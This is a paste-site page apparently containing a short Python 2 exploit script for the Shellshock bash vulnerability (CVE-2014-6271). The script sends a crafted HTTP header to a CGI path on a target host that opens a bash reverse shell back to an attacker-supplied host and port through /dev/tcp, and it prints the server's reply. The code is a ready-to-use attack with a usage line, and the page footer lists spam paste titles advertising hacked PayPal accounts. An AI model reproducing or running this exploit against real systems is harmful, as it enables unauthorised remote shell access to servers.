#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

comments powered by Disqus
TitleTime
2020 NEW HACKED PAYPAL,WE...1 hour
NEW! HACKED PAYPAL, WESTE...1 hour
Chelsea vs Tottenham Hots...2 hours
Untitled2 hours
Untitled5 hours
Fury vs Wilder Live strea...6 hours
???????^@https://furywild...6 hours

© Paste4BTC 2014 - Earn bitcoins by pasting! | My pastes | Popular pastes | New pastes | Payments | FAQ | Terms of Service